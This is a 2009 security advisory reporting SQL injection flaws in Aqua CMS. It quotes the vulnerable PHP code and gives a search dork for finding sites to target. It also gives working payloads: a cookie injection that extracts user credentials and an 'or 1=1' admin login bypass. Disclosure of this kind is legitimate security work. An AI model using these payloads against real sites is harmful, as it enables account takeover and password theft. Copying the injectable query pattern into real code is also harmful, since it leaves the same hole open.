Aqua CMS (username) SQL Injection Vulnerability

2009.04.16
Credit: halkfild
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================================================ Found : halkfild Dork : "Powered By Aqua Cms" Vendor: http://www.aquacms.net/ Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt Visit : crackfor.me, forum.antichat.ru, raz0r.nam Mail : bugtraq[d0g]crackfor.me Home : http://crackfor.me - online md5 crack service ================================================================================ SQL-injections: Need: magic quotes = off vuln file: /droplets/functions/base.php vuln code: 65:// Check the status of the orders if(isset($_COOKIE["userSID"])) { $sqltable = $sitename."_orders"; $selck = $_COOKIE["userSID"]; mysql_select_db($database, $dbconnect); $query_cartcheck = "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1"; $cartcheck = mysql_query($query_cartcheck, $dbconnect) or die(mysql_error()); $row_cartcheck = mysql_fetch_assoc($cartcheck); $totalRows_cartcheck = mysql_num_rows($cartcheck); if ($totalRows_cartcheck != 0) { $user_ip_address = $_SERVER['REMOTE_ADDR']; $dt=date("YmdHis"); $UID="$dt$user_ip_address"; setcookie("userSID", $UID, time()+36000); } } PoC: COOKIE: userSID='[foo] users passwords: select concat_ws(0x3a3a,username,password)+from+aqua.[prefix_here]_users+--+ ----------------------------------------------------------------------------------- Auth bypass Need: magic quotes = off vuln file: /admin/index.php vuln code: 10: if (isset($_POST['username']) == TRUE) { $uusername = $_POST['username']; $upassword = $_POST['password']; $sqltable = $sitename."_users"; mysql_select_db($database, $dbconnect); $query_getuser = " SELECT * FROM $sqltable WHERE username = '$uusername' AND password = '$upassword' AND groups != '' "; $getuser = mysql_query($query_getuser, $dbconnect) or die("Unable to select database"); $row_getuser = mysql_fetch_assoc($getuser); $totalRows_getuser = mysql_num_rows($getuser); if ($totalRows_getuser == 1) { $uid = $row_getuser['id']; $uun = $row_getuser['username']; $ugr = $row_getuser['groups']; $setwsuser = $uid.":".$uun.":".$ugr; //setcookie("wsuser", $setwsuser, time()+36000, '/'); //header("Location: index.php"); } // User logon: end } PoC: POST: username='[foo] Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+

References:

http://www.securityfocus.com/bid/34516
http://www.milw0rm.com/exploits/8432


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top